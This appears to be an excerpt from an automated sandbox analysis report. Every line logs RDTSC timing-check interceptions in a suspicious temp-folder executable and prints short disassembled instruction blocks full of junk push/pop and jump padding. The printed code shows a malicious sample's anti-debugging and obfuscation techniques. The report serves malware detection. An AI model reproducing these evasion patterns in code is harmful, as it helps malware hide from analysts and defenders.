Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53C08AC second address: 53C08FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F34D8F44CC3h 0x00000009 adc eax, 4EEBD2AEh 0x0000000f jmp 00007F34D8F44CC9h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov dword ptr [esp], ebp 0x0000001b jmp 00007F34D8F44CBEh 0x00000020 mov ebp, esp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53C08FF second address: 53C0903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53C0903 second address: 53C0920 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5370078 second address: 537007C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 537007C second address: 5370099 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5370099 second address: 537009F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 537009F second address: 53700C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a mov dh, ch 0x0000000c movsx edx, ax 0x0000000f popad 0x00000010 mov dword ptr [esp], ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F34D8F44CC0h 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53700C6 second address: 53700D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53700D5 second address: 53700DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53700DB second address: 53700DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53700DF second address: 5370127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F34D8F44CC9h 0x00000011 pushfd 0x00000012 jmp 00007F34D8F44CC0h 0x00000017 add si, A818h 0x0000001c jmp 00007F34D8F44CBBh 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5370127 second address: 537018C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F34D94219DFh 0x00000009 sbb ch, FFFFFFDEh 0x0000000c jmp 00007F34D94219E9h 0x00000011 popfd 0x00000012 call 00007F34D94219E0h 0x00000017 pop ecx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov dword ptr [esp], ebx 0x0000001e jmp 00007F34D94219E1h 0x00000023 mov ebx, dword ptr [ebp+10h] 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 movsx edi, cx 0x0000002c mov dx, ax 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 537018C second address: 5370192 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5370192 second address: 5370196 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 537027E second address: 5370296 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D8F44CC4h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5370296 second address: 53702AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53702AF second address: 53702B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53702B3 second address: 53702CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53702CE second address: 53702D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53702D4 second address: 5370370 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F354AFDFD06h 0x00000011 pushad 0x00000012 mov ax, bx 0x00000015 popad 0x00000016 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F34D94219E3h 0x00000024 jmp 00007F34D94219E3h 0x00000029 popfd 0x0000002a pushfd 0x0000002b jmp 00007F34D94219E8h 0x00000030 sub si, 7888h 0x00000035 jmp 00007F34D94219DBh 0x0000003a popfd 0x0000003b popad 0x0000003c je 00007F354AFDFCB6h 0x00000042 pushad 0x00000043 mov si, 561Bh 0x00000047 pushad 0x00000048 push ecx 0x00000049 pop edi 0x0000004a mov esi, 633D75C9h 0x0000004f popad 0x00000050 popad 0x00000051 mov edx, dword ptr [esi+44h] 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007F34D94219DBh 0x0000005b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5370370 second address: 5370376 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5370376 second address: 5370387 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or edx, dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov edx, ecx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5370387 second address: 53703A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D8F44CC7h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53606BE second address: 53606C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53606C2 second address: 53606C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53606C8 second address: 53606CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53606CE second address: 53606D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53606D2 second address: 536077E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F34D94219E1h 0x00000013 xor si, A6D6h 0x00000018 jmp 00007F34D94219E1h 0x0000001d popfd 0x0000001e mov edx, ecx 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 pushad 0x00000023 mov ecx, 67A74B3Fh 0x00000028 mov esi, 0C4F5C5Bh 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 pushad 0x00000031 mov esi, 545AFBD3h 0x00000036 pushad 0x00000037 mov di, ax 0x0000003a pushfd 0x0000003b jmp 00007F34D94219E2h 0x00000040 sub eax, 62ED9758h 0x00000046 jmp 00007F34D94219DBh 0x0000004b popfd 0x0000004c popad 0x0000004d popad 0x0000004e and esp, FFFFFFF8h 0x00000051 jmp 00007F34D94219E6h 0x00000056 xchg eax, ebx 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 536077E second address: 5360782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5360782 second address: 5360786 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5360786 second address: 536078C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 536078C second address: 53607D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F34D94219DBh 0x0000000f xchg eax, ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 movsx ebx, si 0x00000016 pushfd 0x00000017 jmp 00007F34D94219DCh 0x0000001c add ah, 00000078h 0x0000001f jmp 00007F34D94219DBh 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53607D4 second address: 5360816 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F34D8F44CBEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F34D8F44CBCh 0x00000018 mov esi, 48DA2711h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5360816 second address: 536081C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 536081C second address: 536085B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007F34D8F44CBEh 0x00000011 mov esi, dword ptr [ebp+08h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F34D8F44CBAh 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 536085B second address: 5360861 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5360861 second address: 5360867 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5360867 second address: 536086B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 536086B second address: 53608A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub ebx, ebx 0x0000000d jmp 00007F34D8F44CC1h 0x00000012 test esi, esi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov dx, si 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53608A5 second address: 53608AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53608AB second address: 53608E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CBDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F354AB0A786h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 movsx ebx, si 0x00000017 call 00007F34D8F44CC4h 0x0000001c pop ecx 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53608E0 second address: 53608E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53608E6 second address: 53608EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53608EA second address: 53608EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53608EE second address: 536091B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000f jmp 00007F34D8F44CC6h 0x00000014 mov ecx, esi 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 movzx ecx, dx 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 536091B second address: 536092F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx esi, dx 0x00000007 popad 0x00000008 je 00007F354AFE7456h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 536092F second address: 5360935 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5360935 second address: 536093B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 536093B second address: 5360977 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CBDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test byte ptr [76FB6968h], 00000002h 0x00000012 jmp 00007F34D8F44CBEh 0x00000017 jne 00007F354AB0A709h 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F34D8F44CBAh 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5360977 second address: 536097B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 536097B second address: 5360981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5360981 second address: 53609E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c jmp 00007F34D94219E0h 0x00000011 xchg eax, ebx 0x00000012 jmp 00007F34D94219E0h 0x00000017 push eax 0x00000018 jmp 00007F34D94219DBh 0x0000001d xchg eax, ebx 0x0000001e jmp 00007F34D94219E6h 0x00000023 xchg eax, ebx 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 push esi 0x00000028 pop edx 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53609E0 second address: 5360A1B instructions: 0x00000000 rdtsc 0x00000002 mov ax, ECFFh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, ecx 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F34D8F44CC1h 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 mov bx, cx 0x00000016 push eax 0x00000017 push edx 0x00000018 call 00007F34D8F44CC6h 0x0000001d pop ecx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5360A1B second address: 5360A5A instructions: 0x00000000 rdtsc 0x00000002 mov dh, 8Dh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push dword ptr [ebp+14h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F34D94219DFh 0x00000013 xor cx, 138Eh 0x00000018 jmp 00007F34D94219E9h 0x0000001d popfd 0x0000001e mov ch, 9Eh 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5360A84 second address: 5360ADC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, 33h 0x00000005 mov dx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c jmp 00007F34D8F44CC4h 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push ebx 0x00000016 pop ecx 0x00000017 pushfd 0x00000018 jmp 00007F34D8F44CC9h 0x0000001d xor ax, CBE6h 0x00000022 jmp 00007F34D8F44CC1h 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5360ADC second address: 5360AEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D94219DCh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5360AEC second address: 5360B03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esp, ebp 0x0000000a pushad 0x0000000b mov dl, B7h 0x0000000d popad 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov bx, si 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5360B03 second address: 5360B08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1F150 second address: C1F156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1F156 second address: C1F15A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5370D90 second address: 5370D94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5370D94 second address: 5370D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5370D9A second address: 5370DA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5370DA0 second address: 5370DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5370B0B second address: 5370B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xchg eax, ebp 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5370B17 second address: 5370B1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53F07E4 second address: 53F07EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53F07EA second address: 53F07F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D94219DBh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53F07F9 second address: 53F07FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53E0903 second address: 53E0926 instructions: 0x00000000 rdtsc 0x00000002 mov si, FFEDh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 mov ax, 950Fh 0x0000000d push ecx 0x0000000e pop edx 0x0000000f popad 0x00000010 popad 0x00000011 mov dword ptr [esp], ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F34D94219DDh 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53E0926 second address: 53E092C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53E092C second address: 53E0930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53E0730 second address: 53E074A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53E074A second address: 53E0752 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5380270 second address: 5380280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D8F44CBBh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5380280 second address: 5380286 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5380286 second address: 5380295 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5380295 second address: 53802A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53802A8 second address: 53802C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D8F44CC4h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53802C0 second address: 53802C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53802C4 second address: 5380316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F34D8F44CC7h 0x0000000e mov ebp, esp 0x00000010 jmp 00007F34D8F44CC6h 0x00000015 pop ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F34D8F44CC7h 0x0000001d rdtsc
